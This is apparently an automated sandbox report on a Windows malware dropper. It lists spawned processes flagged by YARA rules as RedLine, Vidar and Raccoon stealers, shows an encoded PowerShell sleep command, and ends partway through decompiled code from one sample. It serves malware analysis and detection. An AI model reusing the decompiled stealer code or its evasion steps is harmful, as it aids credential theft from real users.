Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1972 --field-trial-handle=1744,i,4742277565187588249,3541242475859166172,131072 /prefetch:8
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 4628, Parent PID: 4872

General

Target ID:	22
Start time:	03:42:41
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5648 --field-trial-handle=1812,i,13899178159324565324,4792733320013674352,131072 /prefetch:8
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: kukurzka9000.exePID: 5984, Parent PID: 6016

General

Target ID:	23
Start time:	03:42:41
Start date:	23/08/2022
Path:	C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe"
Imagebase:	0x400000
File size:	775168 bytes
MD5 hash:	3EC059BD19D6655BA83AE1E644B80510
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 8196, Parent PID: 5788

General

Target ID:	24
Start time:	03:42:43
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1560 --field-trial-handle=1848,i,16283781183909954720,11832735312998177263,131072 /prefetch:8
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 8448, Parent PID: 6476

General

Target ID:	25
Start time:	03:42:45
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2012 --field-trial-handle=1764,i,7966671234020085067,5591861156680508914,131072 /prefetch:8
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: namdoitntn.exePID: 8632, Parent PID: 6016

General

Target ID:	26
Start time:	03:42:49
Start date:	23/08/2022
Path:	C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe"
Imagebase:	0x2f0000
File size:	109568 bytes
MD5 hash:	BBD8EA73B7626E0CA5B91D355DF39B7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001A.00000000.343257573.00000000002F2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: 0000001A.00000000.343257573.00000000002F2000.00000002.00000001.01000000.00000009.sdmp, Author: unknown Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001A.00000002.857127881.00000000025E2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 8708, Parent PID: 7340

General

Target ID:	27
Start time:	03:42:50
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1680 --field-trial-handle=1808,i,10803361475566917104,16647152247246369842,131072 /prefetch:8
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 8868, Parent PID: 7508

General

Target ID:	28
Start time:	03:42:50
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1944 --field-trial-handle=1748,i,13339803577015116151,3936802353163471100,131072 /prefetch:8
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: real.exePID: 8952, Parent PID: 6016

General

Target ID:	29
Start time:	03:42:51
Start date:	23/08/2022
Path:	C:\Program Files (x86)\Company\NewProduct\real.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Company\NewProduct\real.exe"
Imagebase:	0xfc0000
File size:	281600 bytes
MD5 hash:	A2414BB5522D3844B6C9A84537D7CE43
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: 0000001D.00000000.347251788.0000000000FF3000.00000002.00000001.01000000.0000000C.sdmp, Author: unknown Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: 0000001D.00000002.795454230.0000000000FF3000.00000002.00000001.01000000.0000000C.sdmp, Author: unknown Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: C:\Program Files (x86)\Company\NewProduct\real.exe, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML

Show Windows behavior

Chronological Activities

Analysis Process: safert44.exePID: 9112, Parent PID: 6016

General

Target ID:	30
Start time:	03:42:54
Start date:	23/08/2022
Path:	C:\Program Files (x86)\Company\NewProduct\safert44.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Company\NewProduct\safert44.exe"
Imagebase:	0xc90000
File size:	251904 bytes
MD5 hash:	414FFD7094C0F50662FFA508CA43B7D0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000002.858886258.0000000003234000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: 0000001E.00000000.351377883.0000000000C92000.00000002.00000001.01000000.0000000D.sdmp, Author: unknown Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001E.00000002.851680791.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe, Author: ditekSHen Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML

Show Windows behavior

Chronological Activities

Analysis Process: jshainx.exePID: 9184, Parent PID: 6016

General

Target ID:	31
Start time:	03:42:56
Start date:	23/08/2022
Path:	C:\Program Files (x86)\Company\NewProduct\jshainx.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Company\NewProduct\jshainx.exe"
Imagebase:	0x3e0000
File size:	109568 bytes
MD5 hash:	2647A5BE31A41A39BF2497125018DBCE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001F.00000000.356865696.00000000003F3000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: 0000001F.00000000.356865696.00000000003F3000.00000002.00000001.01000000.0000000E.sdmp, Author: unknown Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001F.00000002.855695700.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, Author: ditekSHen Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML

Show Windows behavior

Chronological Activities

Analysis Process: brokerius.exePID: 4472, Parent PID: 6016

General

Target ID:	33
Start time:	03:42:57
Start date:	23/08/2022
Path:	C:\Program Files (x86)\Company\NewProduct\brokerius.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Company\NewProduct\brokerius.exe"
Imagebase:	0xce0000
File size:	290304 bytes
MD5 hash:	F5D13E361F8B9ACA7103CB46B441034B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000021.00000002.787632512.000000000081A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: 00000021.00000002.795622343.0000000000D14000.00000002.00000001.01000000.0000000F.sdmp, Author: unknown Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: 00000021.00000000.360138360.0000000000D14000.00000002.00000001.01000000.0000000F.sdmp, Author: unknown Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML

Show Windows behavior

Chronological Activities

Analysis Process: captain09876.exePID: 8604, Parent PID: 6016

General

Target ID:	34
Start time:	03:42:59
Start date:	23/08/2022
Path:	C:\Program Files (x86)\Company\NewProduct\captain09876.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Company\NewProduct\captain09876.exe"
Imagebase:	0x7ff786fd0000
File size:	721408 bytes
MD5 hash:	CE94CE7DE8279ECF9519B12F124543C3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: ordo_sec666.exePID: 7560, Parent PID: 6016

General

Target ID:	35
Start time:	03:43:00
Start date:	23/08/2022
Path:	C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe"
Imagebase:	0x400000
File size:	1810960 bytes
MD5 hash:	63FD052610279F9EB9F1FEE8E262F2A4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000023.00000003.402495407.0000000002291000.00000040.00000800.00020000.00000000.sdmp, Author: Florian Roth
Antivirus matches:	Detection: 100%, Joe Sandbox ML

Show Windows behavior

Chronological Activities

Analysis Process: ffnameedit.exePID: 8164, Parent PID: 6016

General

Target ID:	36
Start time:	03:43:03
Start date:	23/08/2022
Path:	C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe"
Imagebase:	0x140000
File size:	109568 bytes
MD5 hash:	3243054D3ACD513ABCC72EE1D1B65C97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000024.00000002.852440303.0000000002562000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000024.00000000.371239903.0000000000153000.00000002.00000001.01000000.00000014.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: 00000024.00000000.371239903.0000000000153000.00000002.00000001.01000000.00000014.sdmp, Author: unknown Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe, Author: ditekSHen Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML

Show Windows behavior

Chronological Activities

Analysis Process: WW1.exePID: 6840, Parent PID: 6016

General

Target ID:	37
Start time:	03:43:05
Start date:	23/08/2022
Path:	C:\Program Files (x86)\Company\NewProduct\WW1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Company\NewProduct\WW1.exe"
Imagebase:	0x12a0000
File size:	289792 bytes
MD5 hash:	86C2F03BBB61BDCAF1AE4BFB22CC2D31
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000025.00000002.788201136.00000000010EA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: 00000025.00000000.377440161.00000000012D3000.00000002.00000001.01000000.00000015.sdmp, Author: unknown Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: 00000025.00000002.792118576.00000000012D3000.00000002.00000001.01000000.00000015.sdmp, Author: unknown Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: C:\Program Files (x86)\Company\NewProduct\WW1.exe, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML

Show Windows behavior

Chronological Activities

Analysis Process: SETUP_~1.EXEPID: 7812, Parent PID: 8604

General

Target ID:	40
Start time:	03:43:41
Start date:	23/08/2022
Path:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE
Imagebase:	0x680000
File size:	350301568 bytes
MD5 hash:	CE25658AC9291C713590B834D96406BB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 4604, Parent PID: 4872

General

Target ID:	41
Start time:	03:43:42
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8796 --field-trial-handle=1812,i,13899178159324565324,4792733320013674352,131072 /prefetch:8
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 6888, Parent PID: 3452

General

Target ID:	42
Start time:	03:43:47
Start date:	23/08/2022
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Imagebase:	0x7ff6f2eb0000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 6564, Parent PID: 4872

General

Target ID:	43
Start time:	03:43:49
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8736 --field-trial-handle=1812,i,13899178159324565324,4792733320013674352,131072 /prefetch:8
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 2996, Parent PID: 4872

General

Target ID:	44
Start time:	03:43:50
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8076 --field-trial-handle=1812,i,13899178159324565324,4792733320013674352,131072 /prefetch:8
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 5604, Parent PID: 4872

General

Target ID:	46
Start time:	03:43:59
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8820 --field-trial-handle=1812,i,13899178159324565324,4792733320013674352,131072 /prefetch:8
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 8768, Parent PID: 7812

General

Target ID:	50
Start time:	03:45:59
Start date:	23/08/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA0AA==
Imagebase:	0x10b0000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 8764, Parent PID: 8768

General

Target ID:	51
Start time:	03:46:01
Start date:	23/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: F0geI.exePID: 7776, Parent PID: 6016COMMON

Execution Graph

Execution Coverage:	10.5%
Dynamic/Decrypted Code Coverage:	72.3%
Signature Coverage:	0.2%
Total number of Nodes:	599
Total number of Limit Nodes:	6

Executed Functions

Function 00401E18 Relevance: 79.6, APIs: 42, Strings: 3, Instructions: 812
memorystringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 55%

			E00401E18(WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				signed int _v56;
				signed int _v60;
				void* _v64;
				signed int _v68;
				char _v72;
				intOrPtr _v76;
				void* _v80;
				intOrPtr _v84;
				signed int _v88;
				char _v92;
				WCHAR* _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				void* _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				void* _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				struct _WIN32_FIND_DATAW _v744;
				void* _t245;
				void* _t247;
				void* _t249;
				void* _t255;
				void* _t257;
				void* _t259;
				void* _t261;
				void* _t263;
				signed int _t265;
				void* _t267;
				void* _t271;
				signed int _t277;
				void* _t284;
				void* _t286;
				void* _t292;
				void* _t294;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				int _t321;
				WCHAR* _t322;
				int _t324;
				WCHAR* _t325;
				void* _t334;
				void* _t336;
				void* _t337;
				void* _t339;
				void* _t340;
				char _t341;
				void* _t342;
				void* _t361;
				void* _t363;
				intOrPtr _t366;
				intOrPtr _t367;
				void* _t368;
				void* _t370;
				intOrPtr _t373;
				intOrPtr _t374;
				void* _t375;
				void* _t377;
				intOrPtr _t380;
				intOrPtr _t381;
				void* _t382;
				void* _t384;
				intOrPtr _t387;
				intOrPtr _t388;
				int _t396;
				WCHAR* _t397;
				int _t398;
				int _t399;
				WCHAR* _t400;
				int _t401;
				signed int _t403;
				signed int _t405;
				void* _t409;
				void* _t411;
				void* _t412;
				void* _t414;
				void* _t415;
				char _t416;
				void* _t417;
				signed int _t427;
				void* _t431;
				void* _t433;
				intOrPtr _t436;
				signed int _t437;
				void* _t438;
				void* _t440;
				intOrPtr _t443;
				signed int _t444;
				void* _t445;
				void* _t447;
				intOrPtr _t450;
				signed int _t451;
				void* _t452;
				void* _t454;
				intOrPtr _t457;
				signed int _t458;
				void* _t461;
				void* _t476;
				signed int _t507;
				void* _t536;
				intOrPtr _t541;
				intOrPtr _t543;
				intOrPtr _t546;
				intOrPtr _t548;
				intOrPtr _t551;
				intOrPtr _t553;
				intOrPtr _t556;
				intOrPtr _t558;
				void* _t564;
				intOrPtr _t569;
				intOrPtr _t571;
				intOrPtr _t574;
				intOrPtr _t576;
				intOrPtr _t579;
				intOrPtr _t581;
				intOrPtr _t584;
				intOrPtr _t586;
				void* _t588;
				void* _t589;
				int _t591;
				void* _t595;
				void* _t598;
				void* _t617;
				signed int _t621;
				void* _t623;
				signed int _t634;
				void* _t636;
				void* _t644;
				void* _t648;
				void* _t651;

				_v100 = __edx;
				_t588 = 0x40;
				_v84 = 0;
				_v96 = __ecx;
				_t245 =  *((intOrPtr*)( *0x40e044))(_t588, 0x208);
				_t461 = _t245;
				_t247 =  *((intOrPtr*)( *0x40e044))(_t588, 0x208);
				_v44 = _t247;
				_t249 =  *((intOrPtr*)( *0x40e044))(_t588, 0x400);
				_v80 = _t249;
				_v28 =  *((intOrPtr*)( *0x40e044))(_t588, 0x100);
				if(_a12 != 0) {
					_t461 =  *((intOrPtr*)( *0x40e13c))(_t461, __ecx);
					_t255 =  *((intOrPtr*)( *0x40e018))(_t461,  &_v744);
					__eflags = _t255 - 0xffffffff;
					if(_t255 == 0xffffffff) {
						return 0;
					}
					_t257 =  *((intOrPtr*)( *0x40e044))(_t588, 0x400);
					_v16 = _t257;
					_t259 =  *((intOrPtr*)( *0x40e044))(_t588, 0x80);
					_v36 = _t259;
					_t261 =  *((intOrPtr*)( *0x40e044))(_t588, 0x200000);
					_v48 = _t261;
					_v32 = _t261;
					_t263 =  *((intOrPtr*)( *0x40e044))(_t588, 0x200000);
					_v52 = _t263;
					_t265 =  *((intOrPtr*)( *0x40e044))(_t588, 0x800000);
					_v40 = _t265;
					_v88 = _t265;
					_t267 =  *((intOrPtr*)( *0x40e044))(_t588, 0x400000);
					_v12 = _v12 & 0x00000000;
					_v56 = _v56 & 0x00000000;
					_v60 = _t267;
					_v24 = _t267;
					_v84 = 1;
					_t271 =  *((intOrPtr*)( *0x40e044))(_t588, 0x400);
					_v20 = _t271;
					_v64 =  *((intOrPtr*)( *0x40e044))(_t588, 0x1000);
					_t277 = E00401C87(__ecx, _v36,  &_v44,  &_v80,  &_v28, _a12);
					_t644 = _t644 + 0x10;
					__eflags = _t277;
					if(__eflags == 0) {
						L20:
						LocalFree(_v48);
						LocalFree(_v40);
						LocalFree(_v60);
						LocalFree(_v20);
						LocalFree(_v64);
						LocalFree(_v36);
						_t284 = _v16;
						__eflags = _t284;
						if(_t284 != 0) {
							LocalFree(_t284);
						}
						goto L22;
					} else {
						_t606 = _v80;
						_t631 = _v44;
						E004027B8( &_v32,  &_v16, __eflags, __ecx, _v44, _v80, _a4);
						E00402CB8( &_v88,  &_v16, __eflags,  &_v32, _v44, _v80, _a4);
						E00403760( &_v24, _t631, _a4);
						_t501 =  &_v52;
						E00403236( &_v52,  &_v16, __eflags,  &_v24, _t631, _t606, _a4);
						_t651 = _t644 + 0x38;
						_t396 = lstrlenW( *0x40e21c);
						_t397 = _v88;
						_v40 = _t397;
						_t398 = lstrlenW(_t397);
						__eflags = _t398 - _t396;
						if(_t398 >= _t396) {
							_t452 = E0040A503(_v40, _t461);
							_t584 =  *0x40e20c; // 0x4e5dc0
							_t454 = E0040A503(E0040A503(_t452, _t584), _v16);
							_t586 =  *0x40e20c; // 0x4e5dc0
							_t501 = E0040A503(E0040A503(_t454, _t586), _v28);
							_v12 = 1;
							_t457 =  *0x40e220; // 0x4f8650
							_v76 = _t457;
							_t458 =  *0x40e1e8; // 0x4e5cc0
							_v72 = _t501;
							_v68 = _t458;
							asm("movsd");
							_v40 = _t501;
							asm("movsd");
							asm("movsd");
						}
						_t399 = lstrlenW( *0x40e1a4);
						_t400 = _v32;
						_v48 = _t400;
						_t401 = lstrlenW(_t400);
						__eflags = _t401 - _t399;
						if(_t401 < _t399) {
							_t634 = _v12;
						} else {
							_t445 = E0040A503(_v48, _t461);
							_t579 =  *0x40e20c; // 0x4e5dc0
							_t447 = E0040A503(E0040A503(_t445, _t579), _v16);
							_t581 =  *0x40e20c; // 0x4e5dc0
							_t501 = E0040A503(E0040A503(_t447, _t581), _v28);
							_t450 =  *0x40e1d8; // 0x4fec10
							_v76 = _t450;
							_t451 =  *0x40e1e8; // 0x4e5cc0
							_v72 = _t501;
							_v68 = _t451;
							_v48 = _t501;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t634 = _v12 + 1;
							_v12 = _t634;
						}
						_t588 = _v24;
						_v60 = _t588;
						_t403 =  *((intOrPtr*)( *0x40e08c))(_t588);
						__eflags = _t403;
						if(_t403 > 0) {
							_t438 = E0040A503(_t588, _t461);
							_t574 =  *0x40e20c; // 0x4e5dc0
							_t440 = E0040A503(E0040A503(_t438, _t574), _v16);
							_t576 =  *0x40e20c; // 0x4e5dc0
							_t501 = E0040A503(E0040A503(_t440, _t576), _v28);
							_t443 =  *0x40e22c; // 0x4ff150
